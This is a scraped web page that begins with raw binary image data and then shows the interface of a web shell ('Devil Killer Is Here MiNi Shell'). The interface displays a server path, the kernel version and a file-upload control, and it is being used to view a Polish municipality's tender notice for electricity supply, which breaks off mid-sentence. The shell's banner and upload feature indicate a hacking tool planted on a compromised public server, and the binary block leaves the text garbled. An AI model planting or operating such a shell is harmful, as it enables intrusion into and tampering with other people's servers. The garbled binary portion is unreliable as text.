JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220413/0012157401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „ZAKUP ENERGII ELEKTRYCZNEJ NA POTRZEBY OŚWIETLENIA<br/>ULICZNEGO ORAZ BUDYNKÓW KOMUNALNYCH GMINY MYKANÓW” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mykanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398110</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Samorządowa 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mykanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-233</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL224 - Częstochowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343288019</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mykanow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mykanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „ZAKUP ENERGII ELEKTRYCZNEJ NA POTRZEBY OŚWIETLENIA<br/>ULICZNEGO ORAZ BUDYNKÓW KOMUNALNYCH GMINY MYKANÓW” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-cfdea5fc-bb22-11ec-97c7-b646b0ba23df</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00121574</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00019827/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa energii elektrycznej dla potrzeb budynków komunalnych i oświetlenia ulicznego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/mykanow/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/mykanow/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w<br/>języku polskim za pośrednictwem https://platformazakupowa.pl/ pod<br/>adresem: https://platformazakupowa.pl/pn/mykanow/proceedings<br/>Zamawiający informuje, że instrukcje korzystania z https://platformazakupowa.pl/ dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych<br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu https://platformazakupowa.pl/<br/>znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>4)Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i<br/>otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”.<br/>Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca,<br/>będzie przekazywana w formie elektronicznej za pośrednictwem https://platformazakupowa.pl/ do<br/>konkretnego wykonawcy.<br/>7) Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania<br/>sprzętowo - aplikacyjne umożliwiające pracę na https://platformazakupowa.pl/ ,tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 104, Linux,<br/>lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja<br/>10.0,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Szyfrowanie na https://platformazakupowa.pl/ odbywa się za pomocą protokołu TLS 1.3.<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas<br/>(hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar.<br/>11) Zamawiający wymaga, by formaty dokumentów sporządzanych przez Wykonawcę były zgodne z<br/>załącznikiem nr 2 do rozporządzenia Rady Ministrów w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych i<br/>jednocześnie rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf<br/>12) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>formatów:<br/>a) .zip<br/>b) .7Z<br/>13) Wśród formatów powszechnych a NIE występujących w rozporządzeniu<br/>występują: .rar .gif .bmp .numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za<br/>złożone nieskutecznie.<br/>14) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym,<br/>który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp<br/>służącej do składania podpisu osobistego, który wynosi max 5MB. 15) Ze względu na niskie ryzyko<br/>naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę<br/>możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich<br/>podpisem kwalifikowanym PadES. 16) Pliki w innych formatach niż PDF zaleca się opatrzyć<br/>zewnętrznym podpisem XAdES.<br/>Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem<br/>podpisywanym.19) Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za<br/>pośrednictwem formularza “Wyślij wiadomość do zamawiającego”, nie za pośrednictwem adresu email.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Gminy w Mykanowie<br/>jest Wójt Gminy Mykanów z siedzibą: ul. Samorządowa 1, 42‑233 Mykanów;<br/>2) we wszystkich sprawach związanych z przetwarzaniem udostępnionych danych osobowych może się Pani/Pan kontaktować z<br/>Inspektorem Ochrony Danych Gminy Mykanów pod adresem e‑mail:<br/>ewa.olejarz@mykanow.pl lub na adres siedziby Urzędu Gminy w Mykanowie ul. Samorządowa 1 42-<br/>233 Mykanów;<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonym w trybie<br/>przetargu nieograniczonego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. -<br/>Prawo zamówień publicznych (dalej ustawy Pzp) oraz podmioty uprawnione do ich przetwarzania na<br/>podstawie przepisów prawa;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Dane będą następnie<br/>przechowywane w celach archiwalnych, przez okres, który wyznaczony zostanie przede wszystkim na<br/>podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych<br/>rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów<br/>zakładowych, chyba, że przepisy szczególne stanowią inaczej;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany i nie będą profilowane;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>10) Obowiązek informacyjny określony przepisami RODO spoczywa także na Wykonawcach, którzy<br/>pozuskują dane osobowe osób trzecich w celu przekazania ich Zamawiającemu w ofertach. Dla<br/>uzyskania przez Zamawiającego potwierdzenia, że osoby, których dane osobowe są przekazywane<br/>Zamawiającemu, dysponują już wskazanymi informacjami, jak również w celu właściwego<br/>zabezpieczenia i ochrony danych tych osób, z których Wykonawca będzie korzystał, przekazanych<br/>przez Wykonawcę w ofercie celem uzyskania przedmiotowego zamówienia publicznego wymagane<br/>jest oświadczenie Wykonawcy dotyczące pozyskania przez Wykonawcę danych osobowych od osób<br/>trzecich, które zawarte jest w formularzu oferty.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GKZ.271.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1). Sprzedaż energii elektrycznej do 125 punktów poboru energii w tym do 104 obwodów<br/>oświetlenia ulicznego oraz 21 obiektów użyteczności publicznej ( budynków komunalnych<br/>lub innych obiektów). Zestawienie punktów poboru wyszczególniono w załączniku nr 5 do<br/>niniejszej specyfikacji. W tym zakresie umowę podpisuje i płatnikiem jest Gmina Mykanów<br/>Szacunkowa ilość dostarczanej energii (+/- 10%) w okresie dostawy 895 150,00 kWh, w<br/>tym:<br/> Energia dla potrzeb oświetlenia drogowego 728 600 kWh<br/> energia dla potrzeb budynków komunalnych 166 550 kWh<br/>Wolumen dla poszczególnych grup taryfowych przedstawia się następująco:<br/>- taryfa 0 11- 728 600 kWh;<br/>- taryfa C 11 – 126 650 kWh;<br/>- taryfa C21- 37 000kWh<br/>- taryfa C12 a – 1 000kWh ( w tym szczytowa 370 kWh , pozaszczytowa 630 kWh)<br/>- taryfa G 11 – 1 900kWh<br/>Moc zapotrzebowana wynosi łącznie 569,0 kW w tym 259,0 kW dla oświetlenia<br/>ulicznego i 310,0 kW dla obiektów użyteczności publicznej.<br/>Wszystkie punkty oświetlenia ulicznego mają grupy taryfowe O11, obiekty : trzy pozycje :<br/>Świetlica Jamno i 2 mieszkania Grabowa ul. Długosza posiadają grupę taryfową G 11 a<br/>pozycja hala sportowa w Mykanowie grupa taryfowa C21, budynek użytkowy w Kokawie<br/>grupa C 12a, pozostałe obiekty posiadają grupę taryfową C11.<br/>Okres rozliczeniowy : co dwa miesiące.<br/>Gmina ma podpisane umowy dystrybucyjne z TAURON Dystrybucja SA na czas<br/>nieokreślony.<br/>Od 01.02.2022r. sprzedawcą energii elektrycznej rezerwowej jest TAURON Sprzedaż Sp.<br/>z o.o.<br/>Będzie to kolejna zmiana sprzedawcy.<br/>Szczegółowy wykaz punktów zawiera załącznik nr 5<br/>2). Sprzedaż energii do punktów poboru energii – dla zasilania budynków dla których<br/>płatnikami faktur za energię elektryczną są następujące jednostki organizacyjne Gminy<br/>Mykanów:<br/>- Szkoła Podstawowa w Starym Cykarzewie – umowa kompleksowa z TAURON<br/>Sprzedaż sp. z o.o. ,taryfa C21 , moc 59kW, średnie roczne zużycie 23 000kWh<br/>- Zespół Szkolno-Przedszkolny w Radostkowie – umowa kompleksowa z<br/>TAURON Sprzedaż sp. z o.o., taryfa C 21, moc 33 kW, średnie roczne<br/>zużycie 22 500kWh<br/>- Przedszkole Publiczne w Starym Cykarzewie – umowa kompleksowa z TAURON<br/>Sprzedaż sp. z o.o., taryfa C 11, moc 24kW, średnie roczne zużycie 7 900 kW<br/>3) Szacunkowa ogólna ilość dostarczanej energii (+/- 10%) w okresie dostawy to<br/>948 550 kWh, w tym energia rozliczana:<br/>w poszczególnych taryfach :<br/>- O11 – 728 600 kWh<br/>- C11 – 134 550 kWh<br/>- C12a – 1 000kWh w tym energia szczytowa 370kWh, pozaszczytowa 630kWh<br/>- C21 – 82 500 kWh<br/>- G 11- 1 900 kWh<br/>Moc umowna dla wszystkich punktów poboru wynosi łącznie 702 kW<br/>W przypadku zmiany ilości punktów poboru lub znaczącej zmiany mocy punktów<br/>poboru w trakcie obowiązywania umowy, zostanie zmieniony Załącznik nr 1 do umowy<br/>bez konieczności renegocjowania warunków umowy. Zmiana Załącznika nr 1 do umowy<br/>nie stanowi zmiany warunków<br/>Kod CPV: 09310000-5 Elektryczność<br/>2. Zamawiający nie dopuszcza możliwości roszczeń Wykonawcy z tytułu błędnego<br/>oszacowania ceny lub pominięcia kosztów i innych czynników mających lub mogących mieć<br/>wpływ na cenę.<br/>Informacje pozostałe.<br/>1). Dostawa energii elektrycznej odbywać się będzie na warunkach określonych przepisami<br/>ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne oraz zgodnie z wydanymi do tej ustawy przepisami wykonawczymi w szczególności ze standardami jakości obsługi<br/>odbiorców określonymi w Rozporządzeniu Ministra Energii z dnia 6 marca 2019 r. w sprawie<br/>szczegółowych zasad kształtowania i kalkulacji taryf oraz rozliczeń w obrocie energią<br/>elektryczną oraz Rozporządzenie Ministra Klimatu i Środowiska z dnia 13 listopada 2020 r.<br/>zmieniające rozporządzenie w sprawie szczegółowych zasad kształtowania i kalkulacji taryf<br/>oraz rozliczeń w obrocie energią elektryczną (tj. Dz.U. 2019 poz. 503 oraz Dz.U. 2020 poz.<br/>2053). (Rozporządzenie zmieniające)<br/>2). Zamawiający udzieli wyłonionemu w postępowaniu Wykonawcy pełnomocnictwa na<br/>które składa się obowiązek:<br/>a) powiadomienia właściwego Operatora Systemu Dystrybucyjnego o zawarciu umowy<br/>sprzedaży energii elektrycznej oraz o planowanym terminie rozpoczęcia sprzedaży<br/>energii elektrycznej,<br/>b) uzyskania, w razie potrzeby, od dotychczasowego sprzedawcy informacji o numerze,<br/>dacie zawarcia, terminie obowiązywania i okresie wypowiedzenia dotychczas<br/>obowiązującej umowy sprzedaży energii elektrycznej i świadczenia usług dystrybucji.<br/>3). Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe<br/>wykonanie zamówienia, za jakość, zgodność z warunkami technicznymi i jakościowymi<br/>określonymi dla przedmiotu zamówienia oraz przyjmuje na siebie pełną odpowiedzialność za<br/>właściwe wykonanie zamówienia.<br/>4). Spełnienie innych wymagań określonych w istotnych postanowieniach umowy oraz<br/>wynikających z obowiązujących przepisów prawa.<br/>5). W związku z charakterem zamówienia nie można określić dokładnego zużycia energii<br/>elektrycznej objętego przedmiotem zamówienia. Z tego powodu Zamawiający przedstawił<br/>przewidywalną ilość zużycia energii elektrycznej. Zamawiający przewiduje, iż rzeczywista<br/>ilość zużycia energii elektrycznej może ulec zmianie, tj. zwiększeniu bądź zmniejszeniu przy<br/>zachowaniu zaoferowanych cen jednostkowych. Tym samym opisane prognozowane zużycie<br/>energii elektrycznej nie stanowi dla Zamawiającego zobowiązania do zakupu energii<br/>elektrycznej w podanej wysokości.<br/>6). Zakres i zasady dokonania zmian:<br/>a) zmniejszenie ilości energii elektrycznej wynikające ze zużycia energii elektrycznej wg<br/>bieżących odczytów z układu pomiarowo - rozliczeniowego, które będzie różne od ilości<br/>energii elektrycznej wskazanego poniżej, odbywa się automatycznie, na podstawie bieżącego<br/>zużycia energii elektrycznej na wystawianych fakturach,<br/>b) zwiększenie ilości energii elektrycznej wynikające ze zużycia energii elektrycznej wg<br/>bieżących odczytów z układu pomiarowo-rozliczeniowego, które będzie różne od ilości<br/>energii elektrycznej wskazanego poniżej odbywa się automatycznie, na podstawie bieżącego<br/>zużycia energii elektrycznej na wystawianych fakturach,<br/>c) zwiększenie/zmniejszenie (dodanie/odjęcie) ilości ppe – wymaga złożenia przez<br/>Zamawiającego jednostronnego oświadczenia woli. Zmiana ilości ppe wynikać może w<br/>szczególności z likwidacji ppe, powstania/nabycia nowego ppe, zmiany właściwości<br/>technicznych ppe, zmiany stanu prawnego lub technicznego ppe, zmiany w zakresie nabywcy,<br/>odbiorcy, płatnika w szczególności przeniesienia praw i obowiązków związanych z obiektem,<br/>przy którym znajduje się dane ppe, zaistnienia przeszkód prawnych i formalnych<br/>uniemożliwiających przeprowadzenie procedury zmiany sprzedawcy lub włączenia bądź<br/>wyłączenia punktu poboru energii elektrycznej przez Zamawiającego.<br/>d) W niniejszym postępowaniu Zamawiający założył zużycie energii elektrycznej wg<br/>rzeczywistego zużycia w okresie rozliczeniowym dotyczącym roku 2021. e) Zamawiający ma prawo, w okresie obowiązywania Umowy do zmiany grup taryfowych,<br/>mocy umownej dla poszczególnych ppe po uprzednim uzgodnieniu warunków technicznych<br/>dokonania tych zmian z Operatorem Systemu Dystrybucyjnego, zwanym dalej OSD. Zmiany<br/>w Umowie następować będą na pisemne zgłoszenie Zamawiającego do Wykonawcy<br/>począwszy od dokonania zmiany przez OSD. Powyższe zmiany będą przeprowadzone na<br/>zasadach określonych w taryfie operatora systemu dystrybucyjnego odpowiedniego dla<br/>Zamawiającego i będą dotyczyły, w szczególności zapewnienia danemu obiektowi<br/>poprawnego funkcjonowania (zgodne z jego przeznaczeniem) i/lub obniżenie kosztów na<br/>usłudze dystrybucji, przy czym zmiany będą dokonywane w obrębie grup taryfowych ujętych<br/>w SWZ<br/>7). Wykonawca zobowiązuje się wykonać przedmiot umowy siłami własnymi lub z udziałem<br/>podwykonawców.<br/>8). Rozliczenia za dostarczone energię elektryczną dokonywać się będą na podstawie faktur<br/>wystawionych przez Wykonawcę w terminach stosowanych przez OSD wg ceny zawartej w<br/>ofercie.<br/>9). Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. W takiej<br/>sytuacji Zamawiający żąda wskazania przez wykonawcę części zamówienia, których<br/>wykonanie zamierza powierzyć podwykonawcom i podania przez wykonawcę firm<br/>podwykonawców (o ile są znani).<br/>10). Wykonawca zobowiązuje się do pełnienia funkcji podmiotu odpowiedzialnego za<br/>bilansowanie handlowe dla energii elektrycznej zużywanej w punktach poboru energii<br/>Zamawiającego.<br/>11). Koszty wynikające z dokonania bilansowania uwzględnione są w cenie energii<br/>elektrycznej.<br/>12). W ramach wykonania przedmiotu zamówienia Wykonawca zobowiązany będzie do:<br/>a) zawarcia w razie nowych punktów PPE w imieniu Zmawiającego umów z OSD na<br/>świadczenie usług dystrybucyjnych,<br/>b) sprzedaży Zamawiającemu energii z zastrzeżeniem, że 